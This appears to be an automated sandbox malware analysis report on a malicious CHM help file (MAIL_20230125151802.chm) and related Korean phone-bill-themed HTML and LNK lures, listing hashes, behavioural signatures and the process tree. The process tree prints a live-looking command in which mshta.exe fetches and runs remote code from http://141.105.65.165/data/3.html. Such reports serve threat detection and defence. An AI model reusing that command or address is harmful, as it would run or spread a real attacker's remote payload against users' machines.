Overview
overview
10Static
static
8LG유플....html
windows7-x64
1LG유플....html
windows10-2004-x64
1LG유플...ml.lnk
windows7-x64
10LG유플...ml.lnk
windows10-2004-x64
10MAIL_20230...02.chm
windows7-x64
10MAIL_20230...02.chm
windows10-2004-x64
10Message.chm
windows7-x64
10Message.chm
windows10-2004-x64
10Message.chm
windows7-x64
10Message.chm
windows10-2004-x64
10Analysis
-
max time kernel
55s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
21-03-2023 23:32
Behavioral task
behavioral1
Sample
LG유플러스_이동통신_202208_이_선.html
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
LG유플러스_이동통신_202208_이_선.html
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
LG유플러스_이동통신_202208_이_선.html.lnk
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
LG유플러스_이동통신_202208_이_선.html.lnk
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
MAIL_20230125151802.chm
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
MAIL_20230125151802.chm
Resource
win10v2004-20230221-en
Behavioral task
behavioral7
Sample
Message.chm
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
Message.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
Message.chm
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
Message.chm
Resource
win10v2004-20230220-en
General
-
Target
MAIL_20230125151802.chm
-
Size
10KB
-
MD5
45bd3001517f5e913ddde83827f4cc29
-
SHA1
710a7d78c4bbca17d6cefce8c392e7d358c37a8d
-
SHA256
c80fbab8c27cb9be91885a470377088d6639b95b85dfe5ae3c346e537b143a87
-
SHA512
c2dcf7d3d6e1353fe6259e326517c07c2e168bc83c0847c293d15d2a0fcc0bbec31506de2347b45a6455465d88a27bde68179352c4473a8eac7ce63b3581bb75
-
SSDEEP
48:U5yGg202QRlEFlErlElZO5sD7GH6N6xWX3VGJtihAxkNzY94ApKSE7HWVMjUBxBD:U5y6khHq6UMl94A0AMjUBxBjR7UyEf0
Malware Config
Extracted
http://141.105.65.165/data/3.html
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exeflow pid process 3 1196 mshta.exe 5 1196 mshta.exe -
Processes:
hh.exemshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main hh.exe Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
AUDIODG.EXEdescription pid process Token: 33 1472 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1472 AUDIODG.EXE Token: 33 1472 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1472 AUDIODG.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 748 hh.exe 748 hh.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
hh.exedescription pid process target process PID 748 wrote to memory of 1196 748 hh.exe mshta.exe PID 748 wrote to memory of 1196 748 hh.exe mshta.exe PID 748 wrote to memory of 1196 748 hh.exe mshta.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\MAIL_20230125151802.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://141.105.65.165/data/3.html ,2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4581⤵
- Suspicious use of AdjustPrivilegeToken